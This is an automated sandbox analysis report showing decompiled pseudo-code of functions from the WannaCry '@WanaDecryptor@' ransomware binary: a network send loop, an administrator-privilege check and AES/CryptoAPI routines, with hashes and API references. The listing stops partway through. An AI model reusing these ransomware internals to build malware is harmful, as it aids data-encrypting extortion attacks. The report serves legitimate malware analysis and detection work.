Opcode ID: dfb134e3e20c56f6c43c465dd7d0b2bdc90d3be31fa2d905cc250f6dcb77a9ab
Instruction ID: 83e3db62829b85d845063e2f81586b9f479c5ffe1e9c48acb6c19853c4e1520f
Opcode Fuzzy Hash: dfb134e3e20c56f6c43c465dd7d0b2bdc90d3be31fa2d905cc250f6dcb77a9ab
Instruction Fuzzy Hash: 8541C2706087829BD720DF64D854BAB7BE4EBC8710F004A3DF599933D0DB789508CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040D4C0 Relevance: 4.6, APIs: 3, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040D4C0() {
				void* __ecx;
				signed int _t17;
				intOrPtr _t19;
				signed int _t28;
				void* _t29;
				signed int _t30;
				signed int _t31;
				signed int _t33;
				intOrPtr* _t34;
				signed int _t48;
				intOrPtr* _t50;
				signed int _t51;
				void* _t52;
				void* _t53;

				_t33 =  *(_t52 + 0x10);
				_t51 = 0;
				_t50 = _t34;
				if(_t33 != 0) {
					_t17 = E0040D5D0(_t50);
					__eflags = _t17;
					if(_t17 != 0) {
						_push(_t52 + 0xc);
						_t48 = 0;
						L0041303E();
						_t19 =  *((intOrPtr*)(_t52 + 0x14));
						_t53 = _t52 + 4;
						__eflags = _t33;
						 *((intOrPtr*)(_t53 + 0x1c)) = _t19;
						if(_t33 > 0) {
							while(1) {
								__eflags = _t19 -  *((intOrPtr*)(_t53 + 0x10)) -  *((intOrPtr*)(_t50 + 0x28));
								if(_t19 -  *((intOrPtr*)(_t53 + 0x10)) >  *((intOrPtr*)(_t50 + 0x28))) {
									goto L16;
								}
								_t28 =  *((intOrPtr*)( *_t50 + 0x24))( *((intOrPtr*)(_t50 + 4)), _t48 +  *((intOrPtr*)(_t53 + 0x18)), _t33 - _t48);
								__eflags = _t28;
								if(__eflags > 0) {
									_t48 = _t48 + _t28;
									__eflags = _t48;
									_push(_t53 + 0x1c);
									goto L15;
								} else {
									if(__eflags != 0) {
										_t29 =  *((intOrPtr*)( *_t50 + 0x28))();
										__eflags = _t29 - 0x2733;
										if(_t29 == 0x2733) {
											_t30 = _t51;
											_t51 = _t51 + 1;
											__eflags = _t30 - 0x64;
											if(_t30 > 0x64) {
												Sleep(0x64);
												_t51 = 0;
												__eflags = 0;
											}
											_push(_t53 + 0x1c);
											L15:
											L0041303E();
											_t53 = _t53 + 4;
											__eflags = _t48 - _t33;
											if(_t48 < _t33) {
												_t19 =  *((intOrPtr*)(_t53 + 0x1c));
												continue;
											}
										}
									}
								}
								goto L16;
							}
						}
						L16:
						__eflags =  *(_t53 + 0x20);
						if( *(_t53 + 0x20) != 0) {
							E0040D2B0(_t50,  *((intOrPtr*)(_t53 + 0x18)), _t48);
						}
						return _t48;
					} else {
						_t31 = _t17 | 0xffffffff;
						__eflags = _t31;
						return _t31;
					}
				} else {
					return 0;
				}
			}

0x0040d4c2
0x0040d4c7
0x0040d4ca
0x0040d4ce
0x0040d4db
0x0040d4e0
0x0040d4e2
0x0040d4f3
0x0040d4f4
0x0040d4f6
0x0040d4fb
0x0040d4ff
0x0040d502
0x0040d504
0x0040d508
0x0040d510
0x0040d519
0x0040d51b
0x00000000
0x00000000
0x0040d532
0x0040d535
0x0040d537
0x0040d566
0x0040d566
0x0040d568
0x00000000
0x0040d539
0x0040d539
0x0040d53f
0x0040d542
0x0040d547
0x0040d549
0x0040d54b
0x0040d54c
0x0040d54f
0x0040d553
0x0040d559
0x0040d559
0x0040d559
0x0040d55f
0x0040d569
0x0040d569
0x0040d56e
0x0040d571
0x0040d573
0x0040d50c
0x00000000
0x0040d50c
0x0040d573
0x0040d547
0x0040d539
0x00000000
0x0040d537
0x0040d510
0x0040d575
0x0040d579
0x0040d57b
0x0040d585
0x0040d585
0x0040d591
0x0040d4e6
0x0040d4e6
0x0040d4e6
0x0040d4eb
0x0040d4eb
0x0040d4d2
0x0040d4d6
0x0040d4d6

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e68fbcf5b22235d79db144bb8702833b1e0f7456deab8b0abe335e8fb721804
Instruction ID: 4ffb44c4908fbcdbada2a4de5981d2af022f8853c63cab2f762cb5961de049d3
Opcode Fuzzy Hash: 5e68fbcf5b22235d79db144bb8702833b1e0f7456deab8b0abe335e8fb721804
Instruction Fuzzy Hash: B121B172B042016FC314DF99AC84C6BB399EBD8358B104A3FF946D7381DA35DC09879A

Uniqueness

Uniqueness Score: -1.00%

Function 00401BB0 Relevance: 4.5, APIs: 3, Instructions: 45
memoryCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00401BB0() {
				char _v3;
				char _v4;
				char _v5;
				char _v6;
				char _v7;
				struct _SID_IDENTIFIER_AUTHORITY _v8;
				void* _v12;
				char _v16;
				void* _v24;
				long _v28;
				int _t16;
				void* _t17;

				_v8.Value = 0;
				_v7 = 0;
				_v6 = 0;
				_v5 = 0;
				_v4 = 0;
				_v3 = 5;
				_v16 = 0;
				_t16 = AllocateAndInitializeSid( &_v8, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
				if(_t16 != 0) {
					_t17 = _v12;
					__imp__CheckTokenMembership(0, _t17,  &_v16);
					if(_t17 == 0) {
						_v28 = 0;
					}
					FreeSid(_v24);
					return _v28;
				} else {
					return _t16;
				}
			}

0x00401bcf
0x00401bd3
0x00401bd7
0x00401bdb
0x00401bdf
0x00401be3
0x00401be8
0x00401bec
0x00401bf4
0x00401bfb
0x00401c06
0x00401c0e
0x00401c10
0x00401c10
0x00401c19
0x00401c27
0x00401bfa
0x00401bfa
0x00401bfa

APIs

AllocateAndInitializeSid.ADVAPI32(?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00401BEC
CheckTokenMembership.ADVAPI32(00000000,?,?,?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000), ref: 00401C06
FreeSid.ADVAPI32(?,?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00401C19

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: a7a265a1dd536a0e0eab8576597306744b18f24eaa9b8ffe7a6d4444507be078
Instruction ID: 94521974df2238a1dc1099b42d01a28c9688a26bfb2bc835d8f4af5c6999d558
Opcode Fuzzy Hash: a7a265a1dd536a0e0eab8576597306744b18f24eaa9b8ffe7a6d4444507be078
Instruction Fuzzy Hash: 3E012C71148380BFE340DB6888C4AABBFE8EBD4704FC4985DF58543252D234D848DB6B

Uniqueness

Uniqueness Score: -1.00%

Function 00404770 Relevance: 4.5, APIs: 3, Instructions: 24
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404770(void* __ecx) {
				long* _t7;
				long* _t8;
				long* _t9;
				void* _t15;

				_t15 = __ecx;
				_t7 =  *(__ecx + 8);
				if(_t7 != 0) {
					CryptDestroyKey(_t7);
					 *(_t15 + 8) = 0;
				}
				_t8 =  *(_t15 + 0xc);
				if(_t8 != 0) {
					CryptDestroyKey(_t8);
					 *(_t15 + 0xc) = 0;
				}
				_t9 =  *(_t15 + 4);
				if(_t9 != 0) {
					CryptReleaseContext(_t9, 0);
					 *(_t15 + 4) = 0;
				}
				return 1;
			}

0x00404771
0x00404773
0x00404778
0x0040477b
0x00404781
0x00404781
0x00404788
0x0040478d
0x00404790
0x00404796
0x00404796
0x0040479d
0x004047a2
0x004047a7
0x004047ad
0x004047ad
0x004047ba

APIs

CryptDestroyKey.ADVAPI32(?,?,004049AD,00404990), ref: 0040477B
CryptDestroyKey.ADVAPI32(?,?,004049AD,00404990), ref: 00404790
CryptReleaseContext.ADVAPI32(FFFFFFFF,00000000,?,004049AD,00404990), ref: 004047A7

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: Crypt$Destroy$ContextRelease
String ID:
API String ID: 1308222791-0
Opcode ID: 12ad5d49cc2128f0860c2128d2759e128a7075486b136358530e399bbd2bca92
Instruction ID: 61d89c14c75fb5affeedc9811425020a0caf5e5d08399d1baa26ca37d3ca979d
Opcode Fuzzy Hash: 12ad5d49cc2128f0860c2128d2759e128a7075486b136358530e399bbd2bca92
Instruction Fuzzy Hash: 22E0EDB03007018BD7309F65D888B4377E8AF84714F04882DF85AE77D0C778E8408B54

Uniqueness

Uniqueness Score: -1.00%

Function 0040A9D0 Relevance: 3.3, APIs: 2, Instructions: 315
COMMONCrypto

Download Yara Rule

C-Code - Quality: 33%

			E0040A9D0(intOrPtr __ecx, signed int _a4, signed char* _a8) {
				void* _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _v25;
				void* _v26;
				signed int _v28;
				void* _v29;
				void* _v30;
				void* _v31;
				signed int _v32;
				void* _v33;
				void* _v34;
				void* _v35;
				signed int _v36;
				void* _v37;
				void* _v38;
				void* _v39;
				signed int _v40;
				signed int _t161;
				signed int _t162;
				signed char* _t165;
				signed int _t187;
				signed int _t188;
				intOrPtr _t190;
				signed int _t277;
				signed int _t345;
				signed int _t346;
				signed int _t349;
				signed int _t360;
				signed int _t361;
				signed int _t364;
				intOrPtr _t375;
				intOrPtr _t386;
				void* _t387;
				signed int _t388;

				_t375 = __ecx;
				_v24 = __ecx;
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					__imp__??0exception@@QAE@ABQBD@Z(0x4213a8);
					_push(0x41c9c0);
					_push( &_v16);
					L004130FC();
				}
				_t345 = 0xbadbad ^  *(_t375 + 0x1e8);
				_v28 = 0 << 0x18;
				_v40 = 0xbadbad ^  *(_v24 + 0x1ec);
				_t277 = 0xbadbad ^  *(_v24 + 0x1f0);
				_v32 = 0 << 0x18;
				_t386 = _v24;
				_t161 =  *(_t386 + 0x410);
				_v36 = 0xbadbad ^  *(_t386 + 0x1f4);
				_v16 = _t161;
				if(_t161 > 1) {
					_a4 = _t386 + 0x210;
					_v20 = _t161 - 1;
					do {
						_t349 = _t345 & 0x000000ff;
						_t187 = _a4;
						_t188 = _t187 + 0x20;
						_a4 = _t188;
						_v40 =  *0x004189B0 ^  *0x004181B0 ^  *0x004185B0 ^  *(0x418db0 + (_t277 & 0x000000ff) * 4) ^  *(_a4 - 4);
						_t277 =  *0x004181B0 ^  *0x004185B0 ^  *0x004189B0 ^  *(0x418db0 + (_v36 & 0x000000ff) * 4) ^  *_a4;
						_t345 =  *0x004185B0 ^  *0x004189B0 ^  *0x004181B0 ^  *(0x418db0 + (_v40 & 0x000000ff) * 4) ^  *(_t188 - 0x28);
						_t190 = _v20 - 1;
						_v28 = _t345;
						_v32 = _t277;
						_v36 =  *0x004181B0 ^  *0x004185B0 ^  *0x004189B0 ^  *(0x418db0 + _t349 * 4) ^  *(_t187 + 4);
						_v20 = _t190;
					} while (_t190 != 0);
					_t161 = _v16;
					_t386 = _v24;
				}
				_t162 = _t161 << 5;
				_t360 =  *(_t162 + _t386 + 0x1e8);
				_t387 = _t162 + _t386 + 0x1e8;
				_a4 = _t360;
				_t165 = _a8;
				 *_t165 =  *0x004170B0 ^ _t360 >> 0x00000018;
				_t165[1] =  *0x004170B0 ^ _t360 >> 0x00000010;
				_t165[2] =  *0x004170B0 ^ _t360 >> 0x00000008;
				_t165[3] =  *((_v40 & 0x000000ff) + 0x4170b0) ^ _a4;
				_t361 =  *(_t387 + 4);
				_a4 = _t361;
				_t165[4] =  *0x004170B0 ^ _t361 >> 0x00000018;
				_t165[5] =  *0x004170B0 ^ _t361 >> 0x00000010;
				_t165[6] =  *0x004170B0 ^ _t361 >> 0x00000008;
				_t165[7] =  *((_v32 & 0x000000ff) + 0x4170b0) ^ _a4;
				_t364 =  *(_t387 + 8);
				_a4 = _t364;
				_t165[8] =  *0x004170B0 ^ _t364 >> 0x00000018;
				_t165[9] =  *0x004170B0 ^ _t364 >> 0x00000010;
				_t125 = _t345 + 0x4170b0; // 0xd56a0952
				_t165[0xa] =  *_t125 ^ _t364 >> 0x00000008;
				_t346 = _t345 & 0x000000ff;
				_t165[0xb] =  *((_v36 & 0x000000ff) + 0x4170b0) ^ _a4;
				_t388 =  *(_t387 + 0xc);
				_a4 = _t388;
				_t165[0xc] =  *0x004170B0 ^ _t388 >> 0x00000018;
				_t165[0xd] =  *0x004170B0 ^ _t388 >> 0x00000010;
				_t165[0xe] =  *0x004170B0 ^ _t388 >> 0x00000008;
				_t142 = _t346 + 0x4170b0; // 0xd56a0952
				_t165[0xf] =  *_t142 ^ _a4;
				return _t165;
			}

0x0040a9d4
0x0040a9d6
0x0040a9df
0x0040a9ea
0x0040a9f4
0x0040a9f9
0x0040a9fa
0x0040a9fa
0x0040aa31
0x0040aa35
0x0040aa6f
0x0040aa93
0x0040aa97
0x0040aab5
0x0040aabf
0x0040aaca
0x0040aace
0x0040aad2
0x0040aadf
0x0040aae3
0x0040aae7
0x0040ab49
0x0040ab9b
0x0040abb9
0x0040abc3
0x0040abe9
0x0040abf4
0x0040abff
0x0040ac03
0x0040ac04
0x0040ac08
0x0040ac0c
0x0040ac10
0x0040ac10
0x0040ac1a
0x0040ac1e
0x0040ac1e
0x0040ac22
0x0040ac25
0x0040ac2c
0x0040ac3b
0x0040ac48
0x0040ac54
0x0040ac65
0x0040ac7d
0x0040ac92
0x0040ac95
0x0040aca0
0x0040acb1
0x0040accb
0x0040ace9
0x0040acf4
0x0040acf7
0x0040ad02
0x0040ad13
0x0040ad29
0x0040ad33
0x0040ad49
0x0040ad4c
0x0040ad5c
0x0040ad5f
0x0040ad6a
0x0040ad7b
0x0040ad91
0x0040ada6
0x0040ada9
0x0040adb6
0x0040adbc

APIs

??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040A9EA
_CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A9FA

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: ??0exception@@ExceptionThrow
String ID:
API String ID: 941485209-0
Opcode ID: 3b2a473cc84b9c7d4a547ef160aa3472c07a9cc6d6db5064c85298185bfba711
Instruction ID: 04248197bcb1574b3d90ae1a3c7ae13e194e7d8d0e6a6b40a3143ad68c5bfd1a
Opcode Fuzzy Hash: 3b2a473cc84b9c7d4a547ef160aa3472c07a9cc6d6db5064c85298185bfba711
Instruction Fuzzy Hash: 0AC18E3260C3D14FD305CF7994A41ABBFE2AF9E300F9E98ADE5D98B312C5609505CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040A610 Relevance: 3.3, APIs: 2, Instructions: 308
COMMONCrypto

Download Yara Rule

C-Code - Quality: 33%

			E0040A610(signed int __ecx) {
				signed char* _t157;
				signed int _t259;
				signed int _t260;
				signed int _t276;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int _t378;
				signed int _t379;
				void* _t380;
				signed int _t381;
				signed int _t390;
				signed int _t391;
				void* _t392;
				void* _t393;

				_t391 = __ecx;
				 *(_t393 + 0x18) = __ecx;
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					__imp__??0exception@@QAE@ABQBD@Z(0x4213a8);
					_push(0x41c9c0);
					_push(_t393 + 0x1c);
					L004130FC();
				}
				_t276 = 0xbadbad ^  *(_t391 + 8);
				 *(_t393 + 0x18) = 0 << 0x18;
				 *(_t393 + 0x14) = 0xbadbad ^  *(_t391 + 0xc);
				_t259 = 0xbadbad ^  *(_t391 + 0x10);
				 *(_t393 + 0x1c) = 0 << 0x18;
				_t378 =  *(_t391 + 0x410);
				 *(_t393 + 0x10) =  *(_t391 + 0x14) ^ 0xbadbad;
				 *(_t393 + 0x20) = _t378;
				if(_t378 > 1) {
					_t392 = _t391 + 0x30;
					 *(_t393 + 0x38) = _t378 - 1;
					do {
						_t392 = _t392 + 0x20;
						 *(_t393 + 0x14) =  *0x004179B0 ^  *0x004175B0 ^  *0x004171B0 ^  *(0x417db0 + (_t276 & 0x000000ff) * 4) ^  *(_t392 - 0x24);
						 *(_t393 + 0x10) =  *0x004171B0 ^  *0x004179B0 ^  *0x004175B0 ^  *(0x417db0 + (_t259 & 0x000000ff) * 4) ^  *(_t392 - 0x1c);
						_t259 =  *0x004175B0 ^  *0x004171B0 ^  *0x004179B0 ^  *(0x417db0 + ( *(_t393 + 0x14) & 0x000000ff) * 4) ^  *(_t392 - 0x20);
						_t276 =  *0x004179B0 ^  *0x004175B0 ^  *0x004171B0 ^  *(0x417db0 + ( *(_t393 + 0x10) & 0x000000ff) * 4) ^  *(_t392 - 0x28);
						_t390 =  *(_t393 + 0x38) - 1;
						 *(_t393 + 0x18) = _t276;
						 *(_t393 + 0x1c) = _t259;
						 *(_t393 + 0x38) = _t390;
					} while (_t390 != 0);
					_t378 =  *(_t393 + 0x20);
					_t391 =  *((intOrPtr*)(_t393 + 0x24));
				}
				_t379 = _t378 << 5;
				_t357 =  *(_t391 + 8 + _t379);
				_t380 = _t391 + 8 + _t379;
				_t157 =  *(_t393 + 0x3c);
				 *_t157 =  *0x00416FB0 ^ _t357 >> 0x00000018;
				 *(_t393 + 0x38) = _t357;
				_t157[1] =  *0x00416FB0 ^ _t357 >> 0x00000010;
				_t87 = _t259 + 0x416fb0; // 0x7b777c63
				_t157[2] =  *_t87 ^ _t357 >> 0x00000008;
				_t157[3] =  *(( *(_t393 + 0x10) & 0x000000ff) + 0x416fb0) ^  *(_t393 + 0x38);
				_t358 =  *(_t380 + 4);
				 *(_t393 + 0x38) = _t358;
				_t157[4] =  *0x00416FB0 ^ _t358 >> 0x00000018;
				_t157[5] =  *0x00416FB0 ^ _t358 >> 0x00000010;
				_t157[6] =  *0x00416FB0 ^ _t358 >> 0x00000008;
				_t157[7] =  *(( *(_t393 + 0x18) & 0x000000ff) + 0x416fb0) ^  *(_t393 + 0x38);
				_t359 =  *(_t380 + 8);
				 *(_t393 + 0x38) = _t359;
				_t157[8] =  *0x00416FB0 ^ _t359 >> 0x00000018;
				_t157[9] =  *0x00416FB0 ^ _t359 >> 0x00000010;
				_t260 = _t259 & 0x000000ff;
				_t157[0xa] =  *0x00416FB0 ^ _t359 >> 0x00000008;
				_t157[0xb] =  *(( *(_t393 + 0x14) & 0x000000ff) + 0x416fb0) ^  *(_t393 + 0x38);
				_t381 =  *(_t380 + 0xc);
				 *(_t393 + 0x34) = _t381;
				_t157[0xc] =  *0x00416FB0 ^ _t381 >> 0x00000018;
				_t157[0xd] =  *0x00416FB0 ^ _t381 >> 0x00000010;
				_t157[0xe] =  *0x00416FB0 ^ _t381 >> 0x00000008;
				_t134 = _t260 + 0x416fb0; // 0x7b777c63
				_t157[0xf] =  *_t134 ^  *(_t393 + 0x2c);
				return _t157;
			}

0x0040a614
0x0040a616
0x0040a61f
0x0040a62a
0x0040a634
0x0040a639
0x0040a63a
0x0040a63a
0x0040a66f
0x0040a67c
0x0040a6a5
0x0040a6c0
0x0040a6c4
0x0040a6e9
0x0040a6ef
0x0040a6f6
0x0040a6fa
0x0040a700
0x0040a704
0x0040a708
0x0040a70a
0x0040a7d5
0x0040a806
0x0040a811
0x0040a818
0x0040a81a
0x0040a81b
0x0040a81f
0x0040a823
0x0040a823
0x0040a82d
0x0040a831
0x0040a831
0x0040a835
0x0040a83a
0x0040a842
0x0040a855
0x0040a85c
0x0040a864
0x0040a872
0x0040a87c
0x0040a888
0x0040a89d
0x0040a8a0
0x0040a8ab
0x0040a8bc
0x0040a8d2
0x0040a8ea
0x0040a8ff
0x0040a902
0x0040a90d
0x0040a91e
0x0040a934
0x0040a946
0x0040a952
0x0040a968
0x0040a96b
0x0040a976
0x0040a987
0x0040a99d
0x0040a9b3
0x0040a9b6
0x0040a9c3
0x0040a9c9

APIs

??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040A62A
_CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A63A

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: ??0exception@@ExceptionThrow
String ID:
API String ID: 941485209-0
Opcode ID: 54df54d15dbdb5da3c1e43968a1bcec609f58f276c7696173b96fc0568058aab
Instruction ID: 24c55d493b92f0f745426086bc8efec80d3c09ac131e354686a8208b9adac079
Opcode Fuzzy Hash: 54df54d15dbdb5da3c1e43968a1bcec609f58f276c7696173b96fc0568058aab
Instruction Fuzzy Hash: CFC15B2260C2C24BD705CF7998E04EBFFE3AF9E204B4E95A9D5C99B322C5719409C799

Uniqueness

Uniqueness Score: -1.00%

Function 0040B0C0 Relevance: 3.2, APIs: 2, Instructions: 242
COMMONCrypto

Download Yara Rule

C-Code - Quality: 58%

			E0040B0C0(intOrPtr __ecx) {
				intOrPtr _t137;
				signed int _t141;
				signed int _t142;
				signed int* _t144;
				signed int _t145;
				void* _t173;
				signed int* _t189;
				signed int _t192;
				signed int _t196;
				intOrPtr _t198;
				signed char _t200;
				intOrPtr _t207;
				signed int _t227;
				signed int _t231;
				intOrPtr _t233;
				intOrPtr _t262;
				void* _t266;
				signed int _t268;
				signed int* _t270;
				signed char* _t274;
				signed char* _t275;
				signed char* _t276;
				signed char* _t277;
				intOrPtr _t281;
				signed int _t282;
				intOrPtr _t286;
				void* _t287;

				_t286 = __ecx;
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					__imp__??0exception@@QAE@ABQBD@Z(0x4213a8);
					_push(0x41c9c0);
					_push(_t287 + 0x34);
					L004130FC();
				}
				_t137 =  *((intOrPtr*)(_t286 + 0x3cc));
				if(_t137 != 0x10) {
					asm("cdq");
					_t196 = _t137 + (_t231 & 0x00000003) >> 2;
					if(_t196 != 4) {
						_t141 = (0 | _t196 != 0x00000006) + 1;
					} else {
						_t141 = 0;
					}
					_t142 = _t141 << 5;
					_t9 = _t142 + 0x41a1dc; // 0x3
					_t233 =  *_t9;
					_t10 = _t142 + 0x41a1e4; // 0x2
					_t198 =  *_t10;
					_t11 = _t142 + 0x41a1ec; // 0x1
					 *((intOrPtr*)(_t287 + 0x30)) = _t233;
					 *((intOrPtr*)(_t287 + 0x20)) =  *_t11;
					 *((intOrPtr*)(_t287 + 0x14)) = _t198;
					_t15 = _t286 + 0x454; // 0x4a8
					_t144 = _t15;
					if(_t196 > 0) {
						_t282 =  *(_t287 + 0x44);
						_t17 = _t286 + 0x1e8; // 0x23c
						 *(_t287 + 0x10) = _t17;
						 *(_t287 + 0x18) = _t196;
						do {
							 *_t144 = 0 << 0x18;
							_t268 =  *_t144 | 0 << 0x00000010;
							 *_t144 = _t268;
							 *_t144 = _t268;
							_t270 = _t144;
							_t282 = _t282 + 4;
							_t144 =  &(_t144[1]);
							 *_t270 =  *_t270 ^  *( *(_t287 + 0x10));
							_t227 =  *(_t287 + 0x18) - 1;
							 *(_t287 + 0x10) =  *(_t287 + 0x10) + 4;
							 *(_t287 + 0x18) = _t227;
						} while (_t227 != 0);
						_t198 =  *((intOrPtr*)(_t287 + 0x14));
					}
					_t145 = 1;
					 *(_t287 + 0x1c) = 1;
					if( *(_t286 + 0x410) > 1) {
						_t28 = _t286 + 0x208; // 0x25c
						 *(_t287 + 0x44) = _t28;
						do {
							if(_t196 > 0) {
								_t281 = _t233;
								 *(_t287 + 0x18) =  *(_t287 + 0x44);
								_t207 =  *((intOrPtr*)(_t287 + 0x20)) - _t233;
								_t33 = _t286 + 0x434; // 0x488
								_t266 = _t33;
								 *((intOrPtr*)(_t287 + 0x28)) = _t198 - _t233;
								 *((intOrPtr*)(_t287 + 0x24)) = _t207;
								 *(_t287 + 0x10) = _t196;
								while(1) {
									_t266 = _t266 + 4;
									asm("cdq");
									 *(_t287 + 0x2c) = 0;
									asm("cdq");
									asm("cdq");
									_t189 =  *(_t287 + 0x18);
									 *(_t287 + 0x18) =  &(_t189[1]);
									 *(_t266 - 4) =  *(0x4189b0 +  *(_t287 + 0x2c) * 4) ^  *(0x418db0 + ( *(_t286 + 0x454 + (_t207 + _t281) % _t196 * 4) & 0x000000ff) * 4) ^  *0x004185B0 ^  *0x004181B0 ^  *_t189;
									_t281 = _t281 + 1;
									_t192 =  *(_t287 + 0x10) - 1;
									 *(_t287 + 0x10) = _t192;
									if(_t192 == 0) {
										break;
									}
									_t207 =  *((intOrPtr*)(_t287 + 0x24));
								}
								_t233 =  *((intOrPtr*)(_t287 + 0x30));
							}
							_t79 = _t286 + 0x434; // 0x488
							_t80 = _t286 + 0x454; // 0x4a8
							_t173 = memcpy(_t80, _t79, _t196 << 2);
							_t287 = _t287 + 0xc;
							_t145 = _t173 + 1;
							_t198 =  *((intOrPtr*)(_t287 + 0x14));
							 *(_t287 + 0x1c) = _t145;
							 *(_t287 + 0x44) =  *(_t287 + 0x44) + 0x20;
						} while (_t145 <  *(_t286 + 0x410));
					}
					 *(_t287 + 0x44) = 0;
					if(_t196 > 0) {
						_t274 =  *(_t287 + 0x48);
						_t89 = _t286 + 0x454; // 0x4a8
						 *(_t287 + 0x48) = _t89;
						_t262 = _t198;
						 *((intOrPtr*)(_t287 + 0x30)) = _t233 - _t198;
						 *(_t287 + 0x2c) =  *((intOrPtr*)(_t287 + 0x20)) - _t198;
						do {
							_t200 =  *(_t286 + 0x1e8 + ( *(_t287 + 0x44) +  *(_t286 + 0x410) * 8) * 4);
							 *_t274 =  *0x004170B0 ^ _t200 >> 0x00000018;
							_t275 =  &(_t274[1]);
							asm("cdq");
							 *_t275 =  *0x004170B0 ^ _t200 >> 0x00000010;
							asm("cdq");
							_t276 =  &(_t275[1]);
							 *_t276 =  *0x004170B0 ^ _t200 >> 0x00000008;
							_t277 =  &(_t276[1]);
							asm("cdq");
							 *_t277 =  *(( *(_t286 + 0x454 + ( *(_t287 + 0x2c) + _t262) % _t196 * 4) & 0x000000ff) + 0x4170b0) ^ _t200;
							_t274 =  &(_t277[1]);
							_t145 =  *(_t287 + 0x44) + 1;
							_t262 = _t262 + 1;
							 *(_t287 + 0x44) = _t145;
							 *(_t287 + 0x48) =  &(( *(_t287 + 0x48))[4]);
						} while (_t145 < _t196);
					}
					return _t145;
				} else {
					return E0040A9D0(_t286,  *(_t287 + 0x44),  *(_t287 + 0x48));
				}
			}

0x0040b0c5
0x0040b0ce
0x0040b0d9
0x0040b0e3
0x0040b0e8
0x0040b0e9
